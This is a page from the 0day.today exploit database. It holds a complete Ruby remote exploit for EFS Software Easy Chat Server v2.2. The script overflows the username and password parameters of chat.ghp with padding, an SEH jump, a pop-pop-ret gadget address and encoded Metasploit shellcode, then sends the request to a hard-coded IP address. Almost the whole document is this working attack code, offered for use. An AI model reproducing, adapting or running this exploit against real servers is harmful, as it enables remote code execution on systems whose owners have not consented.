[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Exploit EFS Software Easy Chat Server v2.2

Author
John Babio
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-10131
Category
remote exploits
Date add
18-01-2010
Platform
unsorted
==========================================
Exploit EFS Software Easy Chat Server v2.2 
==========================================

#!/usr/bin/ruby
 
# Title: Exploit EFS Software Easy Chat Server v2.2
# Author: John Babio
# Tested on: [Windows XP Sp3 Eng]
 
 
require 'net/http'
require 'uri'
require 'socket'
 
 
jmp = "\xeb\x06\x90\x90"
ppr = "\xa2\xb9\01\x10" #SSLEAY32.dll pop ebx, pop ebp, ret
 
#win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
 
shellcode = "\x2b\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x86" +
"\x49\xae\x6a\x83\xeb\xfc\xe2\xf4\x7a\xa1\xea\x6a\x86\x49\x25\x2f" +
"\xba\xc2\xd2\x6f\xfe\x48\x41\xe1\xc9\x51\x25\x35\xa6\x48\x45\x23" +
"\x0d\x7d\x25\x6b\x68\x78\x6e\xf3\x2a\xcd\x6e\x1e\x81\x88\x64\x67" +
"\x87\x8b\x45\x9e\xbd\x1d\x8a\x6e\xf3\xac\x25\x35\xa2\x48\x45\x0c" +
"\x0d\x45\xe5\xe1\xd9\x55\xaf\x81\x0d\x55\x25\x6b\x6d\xc0\xf2\x4e" +
"\x82\x8a\x9f\xaa\xe2\xc2\xee\x5a\x03\x89\xd6\x66\x0d\x09\xa2\xe1" +
"\xf6\x55\x03\xe1\xee\x41\x45\x63\x0d\xc9\x1e\x6a\x86\x49\x25\x02" +
"\xba\x16\x9f\x9c\xe6\x1f\x27\x92\x05\x89\xd5\x3a\xee\xb9\x24\x6e" +
"\xd9\x21\x36\x94\x0c\x47\xf9\x95\x61\x2a\xcf\x06\xe5\x49\xae\x6a"
 
buffer = "\x41" * 216 + jmp + ppr + shellcode
 
url = URI.parse('http://10.10.99.12')
res = Net::HTTP.start(url.host, url.port) {|http|
http.get('/chat.ghp?username=' +buffer+ '&password=' +buffer+ '&room=1&sex=2')
}
puts res.body



#  0day.today [2024-11-15]  #